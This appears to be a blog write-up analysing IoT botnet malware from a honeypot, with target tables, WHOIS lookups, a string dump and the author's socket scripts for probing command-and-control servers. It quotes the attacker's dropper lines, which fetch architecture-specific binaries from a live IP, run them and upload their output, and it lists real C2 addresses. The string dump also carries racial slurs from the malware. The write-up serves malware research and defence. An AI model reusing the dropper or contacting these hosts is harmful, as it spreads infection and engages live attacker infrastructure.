## 79 11 Bell Canada (LINX)
## 287 11 HP Inc. (HPINC-Z)
## 293 11 IANA - Loopback
## 398 11 Mercedes-Benz Group AG
## 460 11 Optimum Online (OPTO)
## 547 11 SITA Switzerland Sarl
## 16 10 African Network Information Center - ( AfriNIC Ltd. )
## 427 10 Navy Network Information Center (NNIC) (NNICN-1)
## 80 9 Bharti Airtel Limited
## 27 8 Alibaba.com Singapore E-Commerce Private Limited
## 60 8 AT&T Mobility LLC (ATTMO-3)
## 516 8 Rogers Communications Canada Inc. (RCC-182)
## 583 8 SURF B.V.
## 541 7 Shaw Communications Inc. (SHAWC)
## 718 7 Xerox Corporation (XEROX-16-Z)
## 241 6 Frontier Communications of America, Inc. (FRTR)
## 298 6 iiNet Limited
## 331 6 JCOM Co., Ltd.
## 334 6 JPMorgan Chase & Co. (JMC-39)
## 399 6 Merck and Co., Inc. (MERCKA)
## 436 6 Nokia of America Corporation (NAC-178)
## 468 6 Orange S.A.
## 63 5 ATI - Agence Tunisienne Internet
## 186 5 DXC US Latin America Corporation (ESLAC-Z)
## 449 5 Oath Holdings Inc. (OH-207)
## 591 5 Tata Communications Limited
## 22 4 Airtel Networks Limited
## 43 4 ANS Communications, Inc (ANS)
## 235 4 Free SAS
## 240 4 Frontier Communications Corporation (FCC-212)
## 365 4 Liquid Telecommunications Operations Limited
## 400 4 Merit Network Inc. (MICH-Z)
## 422 4 National Aeronautics and Space Administration (NASA)
## 457 4 ONLINE S.A.S.
## 461 4 Optus Internet Pty Ltd
## 497 4 PT.TELKOMSEL Indonesia
## 530 4 Scancom Limited
## 596 4 Telecom Italia S.p.A.
## 605 4 Telenor Norge AS
## 607 4 Telia Company AB
## 621 4 The Procter and Gamble Company (THEPRO-10)
## 667 4 USDA Office of Operations (UOO-2)
## 26 3 Alibaba.com LLC (AL-3)
## 115 3 Charter Communications, Inc (CC-3518)
## 125 3 Citicorp (CITICO-10)
## 187 3 DXC US Latin America Corporation (ESLAC)
## 289 3 Hughes Network Systems (HNS)
## 327 3 JAB Wireless, INC. (JABWI)
Since this was largely an endeavor to chase the login prompts before they disappeared and test them out, and the honeypot seems to be hit with this binary enough to find plenty of them later, it's probably time to dig into the malware itself rather than watching network traffic.
The UPX stuff is going to be a pain for this part. After decompressing the binary the disassembly and decompilation is generally even more annoying… I might rage quit depending on the complexity and the fact that I have a full-time job to worry about ;)
$Info: This file is packed with the UPX executable packer http://upx.sf.net $
$Id: UPX 3.94 Copyright (C) 1996-2017 the UPX Team. All Rights Reserved. $
So time to crack out the standard tools: objdump, gdb -tui, xxd, etc.
I'll probably also be using a small quantity of Ghidra and these smaller tools I'd like to point out since they aren't as well known:
https://github.com/BoomerangDecompiler/boomerang
https://github.com/plasma-disassembler/plasma
Analyzing the chaff traffic looks clearly like a secondary attack to DDoS some networks or something while connecting back. While it's definitely not a random generation (at least not a consistent one), it could still just be a generative one I haven't identified such as ((Fibonacci()%253)+1) or something else along those lines. The one that most looks like random is WGETFLOOD, with miori a possible second, this is because of the inclusion of “Future use” and “Multicast” at equal levels of the random output.
All of the targets seemed to be infrastructure, US or North american telecom or government. It's not a huge surprise that the DoD, NASA, Navy, etc is near the top and lots of AT&T, Cloudflare, Level 3, RIPE, Comcast, Akamai, Sprint, Google, etc expected things. Some that stuck out were things like Eli Lilly, Merck, USPS, and Texas Department of Information Resources, they just seem odd. That being said, some of those showed up on random as well, so it's possible they just own more IP space than I'm aware of.
Most of these services are now gone. They disappear quite quickly. That being said, they pop up with new ones enough that I think it shouldn't be a problem finding new ones after doing more disassembly first.
New one found in the wild, analysis here.
Botnet Made By greek.Helios
hello
srhg
suckmadick
considertogoofflinetyvm
gooffline
ovhPwned
NfoPwned
skidripped
TaurusOnYaForhead
TaurusIsYoMomma
IWillNullYourToaster
YourMicrowaveIsAPieceofShit
OogaBoogaLanguage
KysFaggot
niggerssmell
niggersonyaforehead
23.254.230.120
/proc/
self
902i13
BzSxLxBxeY
HOHO-LUGO7
HOHO-U79OL
JuYfouyf87
NiGGeR69xd
SO190Ij1X
LOLKIKEEEDDE
ekjheory98e
scansh4
MDMA
fdevalvex
scanspc
MELTEDNINJAREALZ
flexsonskids
scanx86
MISAKI-U79OL
foAxi102kxe
swodjwodjwoj
MmKiy7f87l
freecookiex86
sysgpu
frgege
sysupdater
0DnAzepd
NiGGeRD0nks69
frgreu
0x766f6964
NiGGeRd0nks1337
gaft
urasgbsigboa
120i3UI49
OaF3
geae
vaiolmao
123123a
Ofurain0n4H34D
ggTrex
wasads
1293194hjXD
OthLaLosn
wget-log
1337SoraLOADER
SAIAKINA
ggtq
1378bfp919GRB1Q2
SAIAKUSO
ggtr
14Fa
SEXSLAVE1337
ggtt
1902a3u912u3u4
haetrghbr
19ju3d
SORAojkf120
hehahejeje92
2U2JDJA901F91
SlaVLav12
helpmedaddthhhhh
2wgg9qphbq
Slav3Th3seD3vices
hzSmYZjYMQ
5Gbf
sora
SoRAxD123LOL
iaGv
5aA3
SoRAxD420LOL
insomni
640277
SoraBeReppin1337
ipcamCache
66tlGg9Q
jUYfouyf87
6ke3
TOKYO3
lyEeaXul2dULCVxh
93OfjHZ2z
TY2gD6MZvKc7KU6r
mMkiy6f87l
A023UU4U24UIU
TheWeeknd
mioribitches
A5p9
TheWeeknds
mnblkjpoi
AbAd
Tokyos
Akiru
U8inTz
netstats
Alex
W9RCAKM20T
newnetword
Ayo215
Word
nloads
Wordmane
notyakuzaa
Belch
Wordnets
BigN0gg0r420
X0102I34f
ofhasfhiafhoi
X19I239124UIU
oism
XSHJEHHEIIHWO
olsVNwo12
DeportedDeported
XkTer0GbA1
onry0v03
FortniteDownLOLZ
Y0urM0mGay
pussyfartlmaojk
GrAcEnIgGeRaNn
YvdGkqndCO
qGeoRBe6BE
GuiltyCrown
ZEuS69
s4beBsEQhd
HOHO-KSNDO
ZEuz69
sat1234
aj93hJ23
scanHA
alie293z0k2L
scanJoshoARM
HellInSide
ayyyGangShit
scanJoshoARM5
HighFry
b1gl
scanJoshoARM6
IWhPyucDbJ
boatnetz
scanJoshoARM7
IuYgujeIqn
btbatrtah
scanJoshoM68K
JJDUHEWBBBIB
scanJoshoMIPS
JSDGIEVIVAVIG
cKbVkzGOPa
scanJoshoMPSL
ccAD
scanJoshoPPC
KAZEN-OIU97
chickenxings
scanJoshoSH4
yakuskzm8
KAZEN-PO78H
cleaner
scanJoshoSPC
KAZEN-U79OL
dbeef
scanJoshoX86
yakuz4c24
KETASHI32
ddrwelper
scanarm5
zPnr6HpQj2
Kaishi-Iz90Y
deexec
scanarm6
zdrtfxcgy
Katrina32
doCP3fVj
scanarm7
zxcfhuio
Ksif91je39
scanm68k
Kuasa
dvrhelper
scanmips
KuasaBinsMate
eQnOhRk85r
scanmpsl
LOLHHHOHOHBUI
eXK20CL12Z
mezy
QBotBladeSPOOKY
hikariwashere
p4029x91xx
32uhj4gbejh
a.out
lzrd
PownedSecurity69
.ares
fxlyazsxhy
jnsd9sdoila
yourmomgaeis
sdfjiougsioj
Oasis
SEGRJIJHFVNHSNHEIHFOS
apep999
KOWAI-BAdAsV
KOWAI-SAD
jHKipU7Yl
airdropmalware
your_verry_fucking_gay
Big-Bro-Bright
sefaexec
shirololi
eagle.
For-Gai-Mezy
0x6axNL
cloqkisvspooky
myth
SwergjmioG
KILLEJW(IU(JIWERGFJGJWJRG
Hetrh
wewrthe
IuFdKssCxz
jSDFJIjio
OnrYoXd666
ewrtkjoketh
ajbdf89wu823
AAaasrdgs
WsGA4@F6F
GhostWuzHere666
BOGOMIPS
sfc6aJfIuY
Demon.
xeno-is-god
ICY-P-0ODIJ
gSHUIHIfh
wrgL
hu87VhvQPz
dakuexecbin
TacoBellGodYo
loligang
Execution
orbitclient
Amnesia
Owari
UnHAnaAW
z3hir
obbo
miori
eagle
doxxRollie
lessie.
hax.
yakuza
wordminer
minerword
SinixV4
hoho
g0dbu7tu
orphic
furasshu
horizon
assailant
Ares
Kawaiihelper
ECHOBOT
DEMONS
kalon
Josho
daddyscum
akira.ak
Hilix
daku
Tsunami
estella
Solar
rift
_-255.Net
Cayosin
Okami
Kosha
bushido
trojan
shiina
Reaper.
Corona.
wrgnuwrijo
Hari
orage
fibre
galil
stresserpw
stresser.pw
Tohru
Omni
kawaii
Frosti
sxj472sz
HU6FIZTQU
PFF1500RG
plzjustfuckoff
nvitpj
elfLoad
Amakano
tokupdater
cum-n-go
oblivion
Voltage
scanppc
A Leafeon is listening on your device
inetnum: 117.194.0.0 - 117.195.255.255
netname: BB-Multiplay
descr: Broadband Multiplay Project, O/o DGM BB, NOC BSNL Bangalore
country: IN
admin-c: BH155-AP
tech-c: DB374-AP
abuse-c: AB1061-AP
status: ALLOCATED NON-PORTABLE
mnt-by: MAINT-IN-DOT
mnt-irt: IRT-BSNL-IN
last-modified: 2021-07-15T07:19:01Z
source: APNIC
irt: IRT-BSNL-IN
address: Internet Cell
address: Bharat Sanchar Nigam Limited.
address: 8th Floor,148-B Statesman House
address: Barakhamba Road, New Delhi - 110 001
e-mail: abuse1@bsnl.co.in
abuse-mailbox: abuse1@bsnl.co.in
admin-c: NC83-AP
tech-c: CGMD1-AP
auth: # Filtered
remarks: abuse1@bsnl.co.in was validated on 2022-05-12
mnt-by: MAINT-IN-DOT
last-modified: 2022-05-12T10:21:35Z
source: APNIC
$ curl -i 117.195.86.34:34673
HTTP/1.1 200 OK
Server: nginx
Content-Length: 135784
Connection: close
Content-Type: application/zip
$ curl -i http://107.182.129.226
HTTP/1.1 200 OK
Date: Sat, 17 Sep 2022 19:30:36 GMT
Server: Apache/2.4.29 (Ubuntu)
Last-Modified: Sat, 03 Sep 2022 15:44:45 GMT
ETag: "270-5e7c7b9d3f067"
Accept-Ranges: bytes
Content-Length: 624
Vary: Accept-Encoding
Content-Type: text/html
rm -rf a3; curl http://107.182.129.226/uwu/arm7 > a3; chmod 777 a3; ./a3 dlink > a; curl -XPUT 107.182.129.226:9832 -T a;
rm -rf a2; curl http://107.182.129.226/uwu/arm5 > a2; chmod 777 a2; ./a2 dlink > b; curl -XPUT 107.182.129.226:9832 -T b;
rm -rf a1; curl http://107.182.129.226/uwu/arm > a1; chmod 777 a1; ./a1 dlink > c; curl -XPUT 107.182.129.226:9832 -T c;
rm -rf a6; curl http://107.182.129.226/uwu/mips > a6; chmod 777 a6; ./a6 dlink > d; curl -XPUT 107.182.129.226:9832 -T d;
rm -rf a9; curl http://107.182.129.226/uwu/mipsel > a9; chmod 777 a9; ./a9 dlink > e; curl -XPUT 107.182.129.226:9832 -T e;
Index of /a
[ICO] Name Last modified Size Description
══════════════════════════════════════════════════════════════
[PARENTDIR] Parent Directory -
[ ] arm 2022-08-13 14:14 55K
[ ] arm5 2022-08-13 14:14 47K
[ ] arm6 2022-08-13 14:14 64K
[ ] arm7 2022-08-13 14:14 126K
[ ] m68k 2022-08-13 14:14 55K
[ ] mips 2022-08-13 14:14 72K
[ ] mpsl 2022-08-13 14:14 72K
[ ] ppc 2022-08-13 14:14 55K
[ ] sh4 2022-08-13 14:14 51K
[ ] spc 2022-08-13 14:14 59K
[TXT] wget.sh 2022-08-13 04:21 285
[ ] x86 2022-08-13 14:14 50K
══════════════════════════════════════════════════════════════
Apache/2.4.29 (Ubuntu) Server at 107.182.129.226 Port 80
Index of /uwu
[ICO] Name Last modified Size Description
══════════════════════════════════════════════════════════════
[PARENTDIR] Parent Directory -
[ ] arm 2022-08-13 08:07 55K
[ ] arm5 2022-08-13 08:07 47K
[ ] arm6 2022-08-13 08:07 64K
[ ] arm7 2022-08-13 08:07 126K
[ ] m68k 2022-08-13 08:07 55K
[ ] mips 2022-08-13 08:07 72K
[ ] mpsl 2022-08-13 08:07 72K
[ ] ppc 2022-08-13 08:07 55K
[ ] sh4 2022-08-13 08:07 51K
[ ] spc 2022-08-13 08:07 59K
[ ] x86 2022-08-13 08:07 50K
══════════════════════════════════════════════════════════════
Apache/2.4.29 (Ubuntu) Server at 107.182.129.226 Port 80
C2 server:
$ cat contained_uwu.txt | grep -E "DST=.*DPT=" | sed -r "s/^.* DST=([^ ]*) .* DPT=([0-9]+) .*$/\1:\2/g" | sort | uniq -c | sort -g | tail -n 10
2 191.75.115.13:23
2 206.178.221.254:23
2 40.174.62.64:23
2 45.174.28.54:23
2 54.91.196.133:23
2 67.78.63.43:23
2 72.105.154.36:23
2 81.103.105.180:23
2 93.155.124.67:23
493 156.96.151.226:7854
NetRange: 156.96.0.0 - 156.96.255.255
CIDR: 156.96.0.0/16
NetName: NEWTREND
NetHandle: NET-156-96-0-0-1
Parent: NET156 (NET-156-0-0-0-0)
NetType: Direct Allocation
OriginAS:
Organization: NEWTREND (NEWTRE)
RegDate: 1991-12-23
Updated: 2021-12-14
Ref: https://rdap.arin.net/registry/ip/156.96.0.0
OrgName: NEWTREND
OrgId: NEWTRE
Address: FastLink Network - Newtrend Division
Address: P.O. Box 17295
City: Encino
StateProv: CA
PostalCode: 91416
Country: US
RegDate: 1991-12-23
Updated: 2011-09-24
Ref: https://rdap.arin.net/registry/entity/NEWTRE
Output of malware to 156.96.151.226:7854
< 00000000 33 66 99 05 00 # 3f...
echo -e "\x33\x66\x99\x05\x00" | socat -ddd - tcp:156.96.151.226:7854
2022/09/17 16:39:38 socat[282837] I socat by Gerhard Rieger and contributors - see www.dest-unreach.org
2022/09/17 16:39:38 socat[282837] I This product includes software developed by the OpenSSL Project for use in the OpenSSL Toolkit. (http://www.openssl.org/)
2022/09/17 16:39:38 socat[282837] I This product includes software written by Tim Hudson (tjh@cryptsoft.com)
2022/09/17 16:39:38 socat[282837] N reading from and writing to stdio
2022/09/17 16:39:38 socat[282837] N opening connection to AF=2 156.96.151.226:7854
2022/09/17 16:39:38 socat[282837] I starting connect loop
2022/09/17 16:39:38 socat[282837] I socket(2, 1, 6) -> 5
2022/09/17 16:39:38 socat[282837] N successfully connected from local address AF=2 10.2.0.2:60078
2022/09/17 16:39:38 socat[282837] I resolved and opened all sock addresses
2022/09/17 16:39:38 socat[282837] N starting data transfer loop with FDs [0,1] and [5,5]
2022/09/17 16:39:38 socat[282837] I transferred 6 bytes from 0 to 5
2022/09/17 16:39:38 socat[282837] N socket 1 (fd 0) is at EOF
2022/09/17 16:39:38 socat[282837] I shutdown(5, 1)
2022/09/17 16:39:38 socat[282837] W read(5, 0x5581670a4000, 8192): Connection reset by peer
2022/09/17 16:39:38 socat[282837] N socket 2 to socket 1 is in error
2022/09/17 16:39:38 socat[282837] N socket 2 (fd 5) is at EOF
2022/09/17 16:39:38 socat[282837] I shutdown(5, 2)
2022/09/17 16:39:38 socat[282837] I shutdown(5, 2): Transport endpoint is not connected
2022/09/17 16:39:38 socat[282837] N exiting with status 0
Normally you should see something after the “shutdown” command, which only shuts down the write stream. Tried a few different ways including netcat and by hand, nothing. I'm pretty sure these are just callbacks now to detect infected nodes. I see no way these can be actual logins into anything. This whole system has to be a ruse, or just a waste of time. It could also already have been sinkholed, I ran nmap and all the ports are open, so that looks like software that just blackholes everything defensively which is common for all of these particular malware strains. When they get knocked offline they don't get sinkholed in that way, they get taken down completely and everything is blocked and closed. Then again, this is a different datacenter, so who knows. For now unless I get further information, my conclusion is this is just a callback to detect infected nodes.
These were the scripts used to debug and try to use as a middle-man to attempt to break into the servers.
#!/usr/bin/env python3
import socket, time
IP="127.0.0.1"
PORT=55566
RESPONSES=[
b'\x1b[?1049h\xff\xfb\x01\xff\xfb\x03\xff\xfc"',
b'\x1b[1;35m\xe3\x83\xa6\x1b[1;37m\xe3\x83\xbc\x1b[1;35m\xe3\x82\xb6\x1b[1;37m\xe3\x83\xbc\x1b[1;35m\xe5\x90\x8d\x1b[1;36m: \x1b[0m',
b'\r\n\x1b[1;35m\xe3\x83\x91\x1b[1;37m\xe3\x82\xb9\x1b[1;35m\xe3\x83\xaf\x1b[1;37m\xe3\x83\xbc\x1b[1;35m\xe3\x83\x89\x1b[1;36m: \x1b[0m',
b'\r\n\r\n\r\x1b[37;1m\xe3\x83\x81\xe3\x82\xa7\xe3\x83\x83\xe3\x82\xaf\xe3\x82\xa4\xe3\x83\xb3\xe6\x83\x85\xe5\xa0\xb1... \x1b[31m-\r\x1b[37;1m\xe3\x83\x81\xe3\x82\xa7\xe3\x83\x83\xe3\x82\xaf\xe3\x82\xa4\xe3\x83\xb3\xe6\x83\x85\xe5\xa0\xb1... \x1b[31m\\',
b'\r\x1b[37;1m\xe3\x83\x81\xe3\x82\xa7\xe3\x83\x83\xe3\x82\xaf\xe3\x82\xa4\xe3\x83\xb3\xe6\x83\x85\xe5\xa0\xb1... \x1b[31m|',
b'\r\x1b[37;1m\xe3\x83\x81\xe3\x82\xa7\xe3\x83\x83\xe3\x82\xaf\xe3\x82\xa4\xe3\x83\xb3\xe6\x83\x85\xe5\xa0\xb1... \x1b[31m/\r\x1b[37;1m\xe3\x83\x81\xe3\x82\xa7\xe3\x83\x83\xe3\x82\xaf\xe3\x82\xa4\xe3\x83\xb3\xe6\x83\x85\xe5\xa0\xb1... \x1b[31m-',
b'\r\x1b[37;1m\xe3\x83\x81\xe3\x82\xa7\xe3\x83\x83\xe3\x82\xaf\xe3\x82\xa4\xe3\x83\xb3\xe6\x83\x85\xe5\xa0\xb1... \x1b[31m\\\r\x1b[37;1m\xe3\x83\x81\xe3\x82\xa7\xe3\x83\x83\xe3\x82\xaf\xe3\x82\xa4\xe3\x83\xb3\xe6\x83\x85\xe5\xa0\xb1... \x1b[31m|',
b'\r\x1b[37;1m\xe3\x83\x81\xe3\x82\xa7\xe3\x83\x83\xe3\x82\xaf\xe3\x82\xa4\xe3\x83\xb3\xe6\x83\x85\xe5\xa0\xb1... \x1b[31m/',
b'\r\x1b[37;1m\xe3\x83\x81\xe3\x82\xa7\xe3\x83\x83\xe3\x82\xaf\xe3\x82\xa4\xe3\x83\xb3\xe6\x83\x85\xe5\xa0\xb1... \x1b[31m-\r\x1b[37;1m\xe3\x83\x81\xe3\x82\xa7\xe3\x83\x83\xe3\x82\xaf\xe3\x82\xa4\xe3\x83\xb3\xe6\x83\x85\xe5\xa0\xb1... \x1b[31m\\',
b'\r\x1b[37;1m\xe3\x83\x81\xe3\x82\xa7\xe3\x83\x83\xe3\x82\xaf\xe3\x82\xa4\xe3\x83\xb3\xe6\x83\x85\
xe5\xa0\xb1... \x1b[31m|\r\x1b[37;1m\xe3\x83\x81\xe3\x82\xa7\xe3\x83\x83\xe3\x82\xaf\xe3\x82\xa4\xe3\x83\xb3\xe6\x83\x85\xe5\xa0\xb1... \x1b[31m/',
b'\r\x1b[37;1m\xe3\x83\x81\xe3\x82\xa7\xe3\x83\x83\xe3\x82\xaf\xe3\x82\xa4\xe3\x83\xb3\xe6\x83\x85\xe5\xa0\xb1... \x1b[31m-',
b'\r\x1b[37;1m\xe3\x83\x81\xe3\x82\xa7\xe3\x83\x83\xe3\x82\xaf\xe3\x82\xa4\xe3\x83\xb3\xe6\x83\x85\xe5\xa0\xb1... \x1b[31m\\\r\x1b[37;1m\xe3\x83\x81\xe3\x82\xa7\xe3\x83\x83\xe3\x82\xaf\xe3\x82\xa4\xe3\x83\xb3\xe6\x83\x85\xe5\xa0\xb1... \x1b[31m|'
]
PING=b"\x00\x00"
RESPONSES_SENT=0
sock = socket.create_server((IP, PORT))
sock.listen(0)
keep_listening = True
while keep_listening:
try:
(conn, address) = sock.accept()
while True:
datatup = conn.recvfrom(1024)
if len(datatup[0]) > 0:
print("RECV DATA:", datatup)
if len(RESPONSES) > RESPONSES_SENT:
print("SEND DATA:", RESPONSES[RESPONSES_SENT])
conn.sendall(RESPONSES[RESPONSES_SENT])
RESPONSES_SENT += 1
else:
print("SEND PING:", PING)
conn.sendall(PING)
time.sleep(0.5)
except ConnectionError as e:
print("ConnectionError:", e)
RESPONSES_SENT = 0
except Exception as e:
keep_listening = False
print("Exception:", e)
if conn is not None:
conn.close()
if sock is not None:
sock.close()
#!/usr/bin/env python3
import socket, time
#IP="46.19.137.50"
#IP="2.56.59.196"
IP="45.95.55.27"
#PORT=55566
#PORT=7777
PORT=32774
CALLDATA=[
b"\x03\x00\x02\x01\x00",
b"\x00"
]
PING=b"\x00\x00"
CALLDATA_SENT=0
keep_connecting=True
while keep_connecting:
sock = socket.create_connection((IP, PORT), 130)
#, ("", 53168))
try:
if len(CALLDATA) > CALLDATA_SENT:
print("SEND DATA:", CALLDATA[CALLDATA_SENT])
sock.send(CALLDATA[CALLDATA_SENT])
CALLDATA_SENT += 1
else:
print("SEND PING:", PING)
sock.send(PING)
datatup = sock.recvfrom(1024)
print("RESPONSE:", datatup)
time.sleep(0.5)
except ConnectionError as e:
print("ConnectionError:", e)
CALLDATA_SENT = 0
except Exception as e:
print("Exception:", e)
if sock is not None:
sock.close()
Geolocation based on IP address is not to be taken as entirely accurate as to the source of traffic or attacks conducted. There are many reasons for this, which include (but are not limited to):
Large quantities of traffic, especially attack based traffic, will use a VPN or the Tor network (or some reasonable facsimile), to mask the origin of the traffic. This will in turn change the appearance of the location of origin. Usually, an attacker will also intentionally want the traffic to appear to come from somewhere that has some form of lesser legal jurisdiction, some form of lesser ability to police traffic, or come from a well known source of malicious attacks such as China or Russia.
For instance, the following log entry was generated by myself against my servers while sitting at my desk in the United States, but it gets geolocated as Russia because of how the packet was sent. This sort of masking is trivial to perform, even by a nine year old on a cellphone.
httpd_data[grep("/from/russia/with/logs", httpd_data$Request), c("Request", "Response.Code", "Country.Code")]
## Request Response.Code Country.Code
## 1 GET /from/russia/with/logs HTTP/1.1 404 RU
Some locations will have a higher distribution of virtual servers than others, such as Silicon Valley or China. This can lead to larger quantities of vulnerable virtual machines and servers in those regions, and distort the resulting aggregate data.
It is possible that due to address assignment for governmental intelligence purposes or other economic or political reasons a nation could re-allocate address space and forge the identity similarly to a NAT (network address translation). They could also funnel information via VPN technologies for another nation.
Because most of these agreements are made in private, and due to the fact that most geolocation, RDAP, and WHOIS records are based on self-reporting, it is impossible to know the 100% true nature of geographic address assignment.
This geolocation uses the rgeolocate package available in CRAN, and uses the internal country database that is shipped with it. There could be an error in the database shipped, there could be an error in the lookup code, etc. Bugs happen. I have no reason to believe that any false geolocation is being performed by these packages, however.
Also used is the self-reported RDAP or WHOIS systems which can frequently be self-reported falsely or misleadingly. Which of the systems (RDAP, WHOIS, or rgeolocate) used are disclosed when necessary.
Despite these weaknesses, this doesn't change the fact that looking at this sort of data can be quite fun and interesting, and potentially enlightening. Generalized conclusions should not be made from this data or the maps herein. You have been warned.